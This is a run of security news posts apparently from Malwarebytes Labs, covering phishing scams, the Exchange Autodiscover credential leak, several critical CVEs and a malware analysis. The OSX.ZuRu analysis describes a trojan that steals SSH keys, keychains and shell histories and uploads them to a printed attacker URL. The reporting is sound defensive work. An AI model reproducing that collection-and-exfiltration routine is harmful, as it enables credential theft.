IT News

This morning Malwarebytes Labs received a scam masquerading as a security alert from Uber. The alert was pretty convincing and used the kind of language we’re used to seeing in genuine security emails and SMS messages. It read:

Your Uber account was recently logged into from iPhone in London. If this wasn't you, reset your password here: [URL redacted]

But what really caught our attention was that the fake security alert came from the phone number that the real Uber uses to send us messages. Of course that doesn’t mean that Uber has been compromised, or that somebody at Uber is running the scam—caller ID spoofing is easy and scammers use it to make their messages appear to come from Uber.

Because it spoofed the real Uber number, the scam security message appeared alongside all the real security messages we get from Uber.

We noticed that the message was a scam because the domain name (the part of the address that ends in .com) just didn’t look right. Although it contained the word “uber” it wasn’t the official Uber domain name, uber.com.

We looked it up and discovered the domain name had only been created today.

Creation Date: 2021-09-24T02:13:38Z

Because scam sites get shut down very quickly, scammers get through a lot of “burner” website names that live and die within days. Most company’s domain names have been around a while, so a very recent creation date is a big red flag.

Another quick check revealed that this absolutely brand new website was hosted in Russia. There’s nothing wrong with hosting websites in Russia, but it isn’t where Uber keeps its websites.

Confident that we were looking at a scam, we created some fake personal details, fired up a Tor browser and jumped into the rabbit hole.

The scam site

The scam site had borrowed enough Uber branding to look convincing, and like all good scam sites it had a valid security certificate and a padlock icon. A useful reminder that the padlock tells us our connection to the site is secure, but says nothing whatsoever about how secure or trustworthy a site is. Nothing.

Page one, pretty vacant

Page one asks us for our phone number. It looks good but under the hood the scammers have done as little work as possible:

• We entered a temporary SMS number instead of our real number, but it also worked without one, because the scammers don’t actually care about capturing your phone number.
• The “Or connect using a social account” link looks convincing but it’s fake. It isn’t broken, it’s just window dressing that was never designed to work.

Page two, the story changes

The next page tells us that we’ve been locked out of our account and need to verify our identity.

We've detected suspicious activity on your Uber account and have temporarily locked it as a security precaution.

Over the next few steps we'll ask you to verify your identity to help secure your account, and let you log back in.

Remember that the initial SMS message just told us we just had to reset our password. The scammers are slowly changing the message here because what they really want is a credit card number.

Page three, ID theft

On the next page the scam site asks for some personal details. This page could be here to steal our ID, or it could just be here to get us comfortable typing in our details, so we don’t think twice when we’re asked for our credit card details on the next page.

Whatever it’s for, they didn’t get anything useful from us. A “burner” site deserves nothing more than a burner ID.

Page four, billing details

Page four of the scam site asked us for both our credit card details and our bank account details. This, presumably, is the whole point of the scam.

At this stage it’s worth recalling that the scammers originally told us we needed to change our password, and later changed the story, telling us we needed to verify our identity. Now we are being asked for “billing details” and there is no mention of verifying our identity.

The scammers are presumably hoping that we will simply respond to the cues on the page—the familiar title “Billing details” and the the usual set of credit card input fields—and won’t think about how we got here.

This page is the reddest of red flags.

It goes without saying that this isn’t how you verify your identity. And remember that the scammers contacted us pretending to be Uber and we “fell” for their scam because we are Uber users. Which means Uber already has our credit card details and there is no reason for us to tell them again.

Plausible-looking credit card numbers are easy to generate, so we fed the scammers some fake details and continued on.

Page five, success?

The last page of the site tells us we have successfully verified ourselves. The purpose of this page is to reassure us that everything is OK, and that nothing is out of the ordinary, before sending us to the real Uber website.

Final page, the real Uber website

The scam site’s last act is to redirect our browser to the real Uber home page. The longer we hang about on the scam site the more likely we are to notice things that aren’t right, so as soon as they have our details the scammers send us on our way. Sending us to the real Uber site presumably also allows us to reassure ourselves that our “locked account” now works.

How not to spot a phish

This scam is a great example of things that can help you spot a scam, and the things that you might hope would help you, but actually work against you.

Things that didn’t help

• Caller ID. Caller ID spoofing is easy and you can’t rely on your phone to tell you who a call or message is from.
• The padlock icon. Anyone can give their website a padlock icon, which is a good thing—it indicates you have a “secure line” to that website—but it says nothing about the website itself, and never did.

Things that did help

• The site did not use Uber’s official domain name. The domain name looked plausible, but it was wrong.
• The story changed. Step-by-step the scammers had to change their story from “reset your password” to “enter your billing details” to get what they wanted.
• The scammers asked for things Uber would already know. Our familiarity with Uber is what made the scam believable, but it also give us an opportunity to spot it.
• Scammers always ask for something valuable, urgently. Although scams come in many different forms, they normally boil down to somebody asking for valuable information urgently. If somebody asks you for valuable information, urgently, and out of the blue, treat it as a red flag and take your time.

Because the scam happened in the UK, we reported it to the UK’s National Cyber Security Centre (NCSC). We also added it to Malwarebytes Browser Guard, and reported to Google’s Safe Browsing.

Although this site was quickly closed down, it’s likely there are others, and it will be easy for the scammers to spin up many more identical replacement sites on new domain names, so please be careful!

The post Beware! Uber scam lures victims with alert from a real Uber number appeared first on Malwarebytes Labs.

The term “cache” refers to a storage container. If you’re familiar with the outdoor recreational activity geocaching, you may be familiar with the term outside of computing. But in website and computer terms, a cache is temporary storage that is used to speed up future requests and load things more quickly for the user.

Caches are used in several different ways in computing.

Your computer’s processor has its own cache called the CPU cache that links the main memory and the processor. There’s a disk cache, too, that links the CPU and storage. Computers also reserve a portion of their RAM to heighten processing speed. And then there’s the browser cache.

What is a browser cache?

In computing terms, and specifically for web browsers, websites use a browser cache to store some elements for faster future loading.

When you try to visit a website, by typing in the URL, or clicking through from Google or another website, you make a request in the web browser. The website you asked for replies to your request by loading the website.

For websites that you visit often, some elements like images or fonts are stored in your browser’s cache. This way, the browser already has some parts of the website so it can load faster on your future visits.

Is it a good idea to clear your cache?

Your browser cache helps websites load faster and more efficiently. Clearing your cache regularly can be counterproductive—it will slow down websites that you visit often, because you have to load all elements just like it’s your very first visit to that site. But clearing your browser cache periodically can be helpful for performance and other reasons.

Why should I clear my browser cache?

Website owners typically update their websites regularly, and so cached website elements become outdated over time. A website that’s not working correctly because the files stored in your browser cache don’t match the files loading from the Internet may perform better after clearing your browser cache. That’s because your browser loads the latest version of the website rather than older cached elements. Think of it like a reset for the website.

Is it time to clear your cache? Here’s how to do so in major web browsers:

How to clear the cache in Google Chrome

1. Start the Chrome browser
2. Click the three vertical dots on the top right.
3. Click More tools.
4. Click Clear browsing data.
5. Select a time range.
6. Check all the boxes.
7. Click Clear data to delete the Chrome cache.

How to clear the cache in Mozilla Firefox

1. Start Mozilla Firefox.
2. Click the three vertical lines on the top right.
3. Click Settings.
4. Select Privacy & Security.
5. Under Cookies and Site Data, click Clear Data.
6. Check the content you wish to clear.
7. Click Clear to delete your Firefox cache.

How to clear the cache in Microsoft Edge

1. Start Microsoft Edge.
2. Click the three horizontal dots on the top right.
3. Click Settings.
4. Click Privacy, search, and services.
5. Under Clear browsing data, click Choose what to clear.
6. Tick all the boxes if you want to delete all the cache.
7. Click Clear now to delete the Edge cache.

How to clear the cache in Internet Explorer

1. Start Internet Explorer.
2. Click the gears icon on the top right.
3. Pick Internet options in the drop-down menu.
4. Find Browsing history in General.
5. Click Delete…
6. Tick all the boxes.
7. Click Delete to delete the cache in Internet Explorer

How to clear the cache on Safari

1. Start Safari
2. Select Preferences from the drop-down menu.
3. Click the Advanced tab.
4. In the menu bar pick Show Develop menu
5. Select Develop from the drop-down menu and click Empty Cache to delete the Safari cache.

How to clear the cache on your iPhone or iPad

1. Go to Settings
2. Tap Safari.
3. Scroll down until you see Clear History and Website Data.
4. Tap Clear History and Website Data.
5. Tap Clear History and Data to clear your browsing history, cookies, location data, etc., and delete the cache on iPhone.

The post How to clear your cache appeared first on Malwarebytes Labs.

Researchers have been able to get hold of 372,072 Windows domain credentials, including 96,671 unique credentials, in slightly over 4 months by setting up a Microsoft Exchange server and using Autodiscover domains.

The credentials that are being leaked are valid Windows domain credentials used to authenticate to Microsoft Exchange servers.

What is Autodiscover?

From Microsoft’s site we learn that “the Autodiscover service minimizes user configuration and deployment steps by providing clients access to Exchange features. For Exchange Web Services (EWS) clients, Autodiscover is typically used to find the EWS endpoint URL. However, Autodiscover can also provide information to configure clients that use other protocols. Autodiscover works for client applications that are inside or outside firewalls and in resource forest and multiple forest scenarios”.

Which boils down to a feature of Exchange email servers that allows email clients to automatically discover email servers, provide credentials, and then receive proper configurations. Designed to make the user’s life easier while forgetting that such designs need to be done with security in mind. Because cybercriminals love such features and use them for their own purposes.

How can it be abused?

The protocol’s goal is to make an end-user be able to completely configure their Outlook client solely by providing their username and password and leave the rest of the configuration to Microsoft Exchange’s Autodiscover protocol.

To accomplish this the Autodiscover protocol looks for a valid Autodiscover URL in these formats, where the example.com is replaced by the domain name (the part after the @) in the users’s email address:

https://autodiscover.example.com/Autodiscover/Autodiscover.xml
http://autodiscover.example.com/Autodiscover/Autodiscover.xml
https://example.com/Autodiscover/Autodiscover.xml
http://example.com/Autodiscover/Autodiscover.xml

This means that to start with, Autodiscover is looking for a URL at a domain or subdomain that is owned by the organization the user belongs to, so mistakes are contained and unlikely to cause problems. But, and here it comes, if none of the above send a valid response the process gets wonky, where it should probably have given up.

If those attempts fail, the next attempt to build an Autodiscover URL drops the example.com part that confines lookups to the user’s organization and looks here:

http://autodiscover.com/Autodiscover/Autodiscover.xml

This gives whoever owns the domain autodiscover.com a huge opportunity.

And the same is true for other Autodiscover top-level domains (TLDs) too, such as autodiscover.es, which will receive requests from all unresponsive .es domains.

To complete the mess, there is no login procedure required on the server side. The unsuspecting user trying to set up their Exchange account is just sending their credentials to an unknown server. There is also no attempt on the client’s side to check if the resource is available, or even exists on the server, before sending an authenticated request.

How bad is it?

It is important to understand that since Microsoft Exchange is part of the Microsoft domain suite of solutions, the credentials that are necessary to login to an Exchange-based inbox are in most cases the same as their domain credentials. The possible consequences of a domain credential leak at such a scale are enormous, and can put entire organizations in danger. Especially in the light of the ongoing ransomware attacks that are daily news. What easier way could an attacker ask for than to gain entry into an organization by using legitimate and valid credentials?

A quick search on my part learned that in most of the big TLDs the autodiscover domains have already been picked up.

Some of the most dangerous ones have been registered by the researchers to do their testing.

Detection and mitigation

Organizations can protect themselves by establishing their own Autodiscover domains, and blocking Autodiscover.TLD domains at the firewall or in their local DNS. Users can block Autodiscover.TLD domains in their hosts file.

Software vendors and developers who are implementing the Autodiscover protocol in their products should make sure that they are not letting it “fail upwards”, meaning that domains such as autodiscover. should never be constructed by the “back-off” algorithm.

When deploying or configuring Exchange server setups, organizations should also make sure that support for basic authentication is disabled. Using HTTP basic authentication sends credentials in clear text, making them easy to intercept.

When a user is being redirected to an Autodiscover.TLD server trying to make use of the leak, a security alert might pop up if it doesn’t have a security certificate, or if it has one that is self-signed. This could easily be avoided by the attacker if they deploy a valid TLS certificate though.

Microsoft was not informed of the problem before the credential harvesting was set in motion and the results were already published, so they are still investigating and promised to take appropriate steps to protect customers.

Stay safe, everyone!

The post Microsoft Exchange Autodiscover flaw reveals users’ passwords appeared first on Malwarebytes Labs.

The Spanish National Police (Policía Nacional) has successfully dismantled an organized crime ring of hundreds of members in a sting operation supported by Europol, the Italian National Police (Polizia di Stato), and Eurojust. This is the end result of a year-long investigation.

The organized crime ring, which operated in Spain’s Canary Islands, is said to have ties with the Italian Mafia who are “involved in online fraud, money laundering, drug trafficking and property crime.” The official site of the Spanish National Police named the Italian mafia clans as the Casamonica, Camorra Napolitana, Nuvoletta, and Sacra Corona Unita.

In just a year, they were able to steal a total of 11.72M USD (10M EUR) from hundreds of victims of phishing attacks and other fraudulent activities such as SIM swapping (also known as SIMjacking), business email compromise (BEC), and money muling. The Spanish National Police page also mentioned other crimes, such as “kidnapping, falsification of documents, injuries, threats, coercion, robbery with violence, Social Security fraud and illegal possession of weapons.

Europol has summarized the overall results of this sting:

• 106 arrests, mostly in Spain and some in Italy
• 16 house searches
• 118 bank accounts frozen
• Seizures include many electronic devices, 224 credit cards, SIM cards and point-of-sale terminals, a marijuana plantation and equipment for its cultivation and distribution.

Europol described the ring as “very well organized”, saying it included computer experts who created the phishing domains and spear headed cyber fraud, money mule recruiters and organizers, and money launderers, some of whom are said to be cryptocurrency experts.

Most of the suspects are Italian nationals, who largely victimized Italian citizens into sending large sums of money to bank accounts the criminal network controls. From there, the money was then moved by money mules and invested into shell companies. Countries affected by their fraudulent schemes include Spain, Germany, Ireland, Italy, Lithuania, and the United Kingdom.

“Cyber mafia” is not an unknown concept in the cybersecurity world.

In 2012, Belgian police were called in to investigate a case involving computers of the Swiss Shipping Company, MSC. They found “tiny computers known as pwnies (pronounced ponies) packed in memory sticks and sitting on several of the workstations”, which caused dramatic and consistent computer slowdown. They realized that these pwnies were being used to steal important information needed “to track specific containers and gain access to restricted areas of the port.” Once these containers were ready for collection, the mafia swooped in, sending in their trucks to drive the containers away. Journalist Misha Glenny called it “the most dramatic example that law enforcement had ever seen of the fusion of two types of crime: a traditional mafia operation and criminal hackers.”

In a more recent example, Italy’s Anti-mafia Directorate (DIA) published a report [PDF, in Italian only] in August about Italian Mafia groups turning to the dark web to hide their criminal activities, and masking the transfer of ill-gotten money using cryptocurrencies like Bitcoin and Monero.

The post Italian mafia cybercrime sting leads to 100+ arrests appeared first on Malwarebytes Labs.

It’s not every day you receive a big money offer from someone claiming to sit in political asylum, but here we are. The following missive landed in our spam traps at the weekend.

The mail claims to be from the daughter of no less than the late Colonel Gaddafi. Ayesha Gaddafi promises you untold riches if you help her find a home for $27.5 million.

The bogus mail, titled “Re: Please i need your help”, reads as follows:

Re: Please i need your help

I am sending my greetings to you from the Sultanate of Oman, In the capital city of Muscat.

May i use this medium to open a mutual communication with you, and seeking your acceptance towards investing in your country under your management as my partner, My name is Aisha Gaddafi and presently living in Oman, i am a Widow and single Mother with three Children, the only biological Daughter of late Libyan President (Late Colonel Muammar Gaddafi) and presently i am under political asylum protection by the Omani Government.

I have funds worth “Twenty Seven Million Five Hundred Thousand United State Dollars” -$27.500.000.00 US Dollars which i want to entrust on you for investment project in your country.If you are willing to handle this project on my behalf, kindly reply urgent to enable me provide you more details to start the transfer process.

I shall appreciate your urgent response through my email address below: aishaggaddafi36[removed]

Thanks

Yours Truly Aisha

The background to this tall tale

Ayesha fled Libya shortly after the Battle of Tripoli back in 2011. She eventually moved from Algeria to Oman, where she claims political asylum to this day. Note that the mail claims she’s a “single mother with three children”. The scammers can’t even get this right; Aisha has had four children, but two of them were killed during the fighting in 2011.

This is likely something they’re hoping most recipients of the mail will bother digging into too deeply. The prize, after all, is a remarkably large one.

What’s the impact of the scam here?

Should you respond, there’s a very good chance one or all of the below will take place.

• You’ll lose an incredible amount of money. They just want your bank details. You’ll either find yourself sending them sums of cash for [inexplicable reason goes here], or you’ll be sent some money.
• Being sent some money means you’re now a money mule. This is illegal, and you’re helping criminals to move around ill-gotten gains. You know how in cartoons, a character is left holding the bag in front of the police while the criminal is free to slink away? This will be you.
• Personal details stolen. Many of these scams involve you sending scanned copies of passports or other forms of ID. This now leaves you open to identity theft, and other related shenanigans.

The following will not happen:

• At no point will you be conversing with the real Ayesha Gaddafi
• You will not get rich

Should this wind up in your mailbox: Report, delete, and block the sender. There’s no scenario here which plays out any other way than you losing your time, identity, and money to a fraudster.

For “Ayesha”, the search for an overseas investment opportunity continues.

The post No, Colonel Gaddafi’s daughter isn’t emailing to give you untold riches appeared first on Malwarebytes Labs.

VMware is urging users of vCenter server to patch no fewer than 19 problems affecting its products.

These updates fix a variety of security vulnerabilities, but and one of them is particularly nasty. That would be CVE-2021-22005, a critical file upload vulnerability with a CVSS score of 9.8 out of 10.

It’s so bad the company is advising users to sort it out “right now“:

These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an “emergency change.”

CVE-2021-22005

vServer Center is a way to manage large infrastructure. If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won’t end well.

And that’s exactly what CVE-2021-22005 does. It’s a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don’t make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.

As VMware points out, bad actors are often already in your network. They wait patiently to strike. It’s likely they’ll exfiltrate data slowly and nobody will ever know they’re there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.

What should I do?

Well, patch immediately is definitely the go-to advice. If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.

Is my vServer setup affected by this?

It depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the dedicated rundown on this issue and take appropriate action as soon as you possibly can. We’ll leave the last word to VMware with regard to when you should be patching:

Immediately, the ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available.

With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.

This seems like very good advice.

The post Patch vCenter Server “right now”, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure appeared first on Malwarebytes Labs.

In a detailed post on Github, security researcher Watchful_IP describes how he found that the majority of the recent camera product ranges of Hikvision cameras are susceptible to a critical, unauthenticated, remote code execution (RCE) vulnerability, even with the latest firmware.

Hikvision

Hangzhou Hikvision Digital Technology Co., Ltd. engages in the development, production, and sale of security products. Its business activities include the provision of services for hard disk recorders, video codes, video servers, surveillance cameras, monitoring of ball machine, road mounts and other products, as well as security services. The company was founded on November 30, 2001 and is headquartered in Hangzhou, China.

According to global market data provider IHS Markit, Hikvision has 38% of the global market share, and it has been the market leader since 2011. Hikvision is also known for its research on technologies such as visual recognition, cloud computing, and their adoption in security scenarios.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability found by Watchfull_IP is listed under CVE-2021-36260 and could allow an unauthenticated attacker to gain full access to the device and possibly perform lateral movement into internal networks.

The critical bug has received 9.8 out of 10 on the CVSS scale of severity, clearly demonstrated by the fact it enables the attacker to gain even more access than the owner of the device has, since the owner will be restricted to a limited protected shell (psh) which filters input to a predefined set of limited, mostly informational commands.

According to the researcher, the vulnerability has existed at least since 2016. All an attacker needs is access to the http(s) server port (typically 80/443). No username or password is needed, nor are any actions needed from the camera owner. The attack will not be detectable by any logging on the camera itself. A threat actor can exploit the vulnerability to launch a command injection attack by sending some messages with specially crafted commands.

Affected products

Users can find a list of affected products in the security notification from Hikvision. Among them are IP Cameras and  PTZ Cameras. PTZ is short for Pan/Tilt/Zoom and the name is used for cameras that can be remotely controlled and pointed. These cameras can, and are often used in surveillance mode where they cover an area by moving between preset points and the footage is often recorded, so it can be reviewed at a later time.

Users of other brands should also be advised that there are a huge number of OEM resellers offering Hikvision cameras under their own model numbers.

Responsible disclosure

The researcher has not disclosed any specifics about the attack to protect potential victims. In his post he describes how he worked with Hikvision since the discovery made on Sunday June 20, 2021. He was extremely pleased that they took him seriously and involved him in taking care of the problem.

On August 17, Watchfull_IP received the patched IPC_G3 (V5.5.800 build 210628) and IPC H5 (V5.5.800 build 210628) firmware from HSRC for testing.

“Decrypted and reversed the code in addition to live testing on my own equipment and confirmed to HSRC that the patched firmware resolves the vulnerability.

Was further pleased to note this problem was fixed in the way I recommended.”

We are glad that researchers like this check the security of the products we use and do responsible disclosure when they find problems, so manufacturers can resolve matters before some cybercriminal can start using our security equipment against us.

Mitigation

A word of caution is needed here, since not all the software portals have been provided with the latest firmware that is patched against this attack. To be sure to get a patched version it is recommended by Hikvision to download the latest firmware for your device from the global firmware portal. The researcher however notes that at the time of writing updated firmware seems to be properly deployed on the Hikvision China region firmware portal for Chinese region devices, but only partially on the global site. If you are in doubt there is a list of the vulnerable firmware versions in the researchers post.

In general it is a good idea not make your cameras accessible from the internet and if you do, put them behind a VPN.

The post Patch now! Insecure Hikvision security cameras can be taken over remotely appeared first on Malwarebytes Labs.

Malwarebytes has reason to believe that the MSHTML vulnerability listed under CVE-2021-40444 is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.

The first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country’s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia’s largest research and development centers for developing rocket and space technology.

The email claims to come from the Human Resources (HR) department of the organization.

It says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.

The attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.

The second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.

The title of the documents translates to “Notification of illegal activity.” It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.

Russian targets

It is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.

Patched vulnerability

The CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn’t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.

Microsoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a patch into its recent Patch Tuesday output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.

Будьте в безопасности, все!

The post MSHTML attack targets Russian state rocket centre and interior ministry appeared first on Malwarebytes Labs.

Another day, another example of how the data sharing choices we make can come back to haunt us. The Guardian reports a Florida resident finding his bike ride data requested by law enforcement. This is due to his route taking him close to the scene of a burglary a year earlier.

According to the report, he had just seven days to put something in front of a judge to block the data’s release. Not everyone would know how to do this, much less have heard of geofencing before.

What happened here?

Geofencing 101

Geofencing wraps virtual “fences” around real locations. It’s commonly talked about in relation to advertising and marketing activities, and it helps you track movement by pinging away should you enter or leave a specified location. It can be helpful or adversarial, depending on your need, and your point of view. It can be used for things as varied as keeping your advertising spend focussed on people from a particular area, or tracking that serious offenders under some form of house arrest don’t outside the areas they’re allowed to visit.

What is a geofence warrant?

A geofence warrant, also known as “reverse location warrants”, involve grabbing data on everybody close to a crime scene. Were you involved? Or simply passing by? Doesn’t matter! Into the pile of law enforcement data you go. You just have to hope you’re not caught up in some sort of mistaken identity fiasco down the line.

These warrants are increasingly being used for all sorts of reasons. The fear is they’ll contribute to a chilling effect on free speech, protest, and more. Indeed, Google has recently said these warrants “make up one quarter of all US demands” for its data. It’s easy to see why this would be the case. It’s lots of incredibly precise movement data, tied to big slices of people’s personal identity and physical objects kept about their person.

Which keywords open the door?

It’s not just geofencing causing headaches for privacy advocates. Requests for keyword searches are very popular too. This is where your search history is grabbed and examined for signs of…well…who knows. Essentially, you’re at the mercy of completely random investigations aligning with your completely random searches.

While Google states these data requests “…represent less than 1% of total warrants and a small fraction of the overall legal demands for user data that we currently receive”, it’s still rather uncomfortable to think about.

Is there any refuge in anonymity?

Well, that’s a very good question. There’s plenty of examples where theoretically anonymous data turned out not to be, after ending up online. Time and again we’ve seen that, with surprisingly few data points, users can be identified from anonymised data.

Geofence warrants leapfrog several of those issues and go directly for the user ID. If you make use of any form of location data whatsoever, it can be used against you. Even if you disable your Bluetooth, refuse beacon access, turn off all GPS features, choose not to store your exercise routes in your latest exercise app. Simply carrying the phone around and using it as intended is potentially more than enough.

There is no simple solution to this one; primarily it’s down to Google to run a tight ship. It’s also incumbent on privacy orgs and people working at various levels of Government to ensure no overreach is taking place.

What can I do to reduce any privacy risk?

You can consider using services other than Google. If you don’t want your entire online existence in one big pot of data, feel free to mix and match a little. Try out DuckDuckGo for your searching perhaps, or fire up a VPN. Just be aware that other organisations may not have the same outlook on these requests as Google does. It might be the case that they don’t have the same legal might Google carries. They may have no policy on this kind of request at all, and hand everything they have on you to whoever asks for it. This would probably not be ideal in the privacy stakes.

The choice, as they say, is yours.

The post Google, geofence warrants, and you appeared first on Malwarebytes Labs.

Last week, security researcher Patrick Wardle released details of a new piece of malware masquerading as the legitimate app iTerm2. The malware was discovered earlier the same day by security researcher Zhi (@CodeColorist on Twitter), and detailed on a Chinese-language blog. (For those who don’t speak Chinese, Safari seems to do a fair job of translating it.)

iTerm2 is a legitimate replacement for the macOS Terminal app, offering some powerful features that Terminal does not. It is frequently used by power users. It is a favorite of security researchers because of the propensity for Mac malware to take control or detect usage of the Terminal app, which can interfere with attempts to reverse engineer malware. This makes iTerm2 an ideal app to trojanize to infect people who may have access to development system, research intelligence, etc.

The website for the legitimate iTerm2 app is iTerm2.com. However, the malicious version of iTerm2 was apparently being distributed via iTerm2[.]net, which was a very convincing duplicate of the legitimate iTerm2 site.

Clicking the download link on the lookalike site would result in an iTerm2.dmg disk image file being downloaded from kaidingle[.]com.

The disk image throws the first red flag. The real iTerm2 is distributed in a zip file, rather than a disk image. Further, for an app with a very professionally designed website, the disk image file is quite unpolished. It also includes a link to the Applications folder with a Chinese name, which is unusual for an app that is English-only and does not contain any Chinese localization files.

Malware behavior

The malicious iTerm2 app appears to be a legitimate copy of the iTerm2 app, but with one file added:

iTerm.app/Contents/Frameworks/libcrypto.2.dylib

When launched, the malicious app loads and runs the malicious libcrypto.2.dylib dynamic library, which in turn does a couple things.

The main purpose seems to be to connect to 47.75.123[.]111, from which it downloads a Python file named g.py and a mach-O binary named GoogleUpdate into the /tmp folder, then executes both of them.

The GoogleUpdate binary is heavily obfuscated, and it’s currently not known exactly what it does. However, according to Patrick, it communicates with what appears to be a Cobalt Strike server (47.75.96[.]198:443), which may mean it is a Cobalt Strike “beacon,” which would provide comprehensive backdoor access to the attacker.

The g.py file is clear-text Python code, and thus its intent is quite clear. It collects the following data:

• Machine serial number.
• Contents of the user’s home, desktop, Documents, and Downloads folders.
• Applications folder contents.
• Command histories for bash and zsh, which can contain sensitive information such as credentials.
• The git config file, which contains potentially sensitive information, including an e-mail password.
• The /etc/hosts file, which can contain details on custom servers accessed by the user.
• The .ssh folder, which can contain credentials for SSH.
• The user’s keychains, which contain many credentials and can be unlocked if the user’s password can be obtained.
• The config file for SecureCRT, a terminal emulator program.
• The saved application state for iTerm2.

These files are all copied into ~/Library/Logs/tmp/, compressed into a file at ~/Library/Logs/tmp.zip, which is then uploaded to http://47.75.123[.]111/u.php?id=%s (where the %s is replaced with the machine’s serial number).

Thus, the primary goal of the g.py script seems to be to harvest credentials and other data that would be of use for lateral movement within an organization. Presumably, the backdoor provided by the GoogleUpdate process would be used to perform that lateral movement and infect other machines.

Additional trojanized apps

Subsequent findings revealed additional apps that had also been trojanized, using the same libcrypto.2.dylib file. These apps were:

• Microsoft Remote Desktop
• SecureCRT
• Navicat Premium (a database management app)

Who is affected?

At the moment, few people with Malwarebytes installed seem to be affected. We’ve only seen a detection on one computer so far, in Asia.

There are indications that this malware may be primarily distributed in China and other southeast Asian countries, where Malwarebytes has a relatively small install base. For readers outside that region, you probably don’t have much to fear.

However, out of an abundance of caution, if you have one of these apps, it would not be a bad idea to replace them with a known legitimate copy, being sure to get it from the official website of the developer rather than from a lookalike site or a download mirror.

You should also run a scan with Malwarebytes, which will detect this malware as OSX.ZuRu.

Samples

iTerm2.dmg                   e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa
com.microsoft.rdc.macos.dmg  5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259
Navicat15_cn.dmg             6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff
SecureCRT.dmg                1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921

The post New Mac malware masquerades as iTerm2, Remote Desktop and other apps appeared first on Malwarebytes Labs.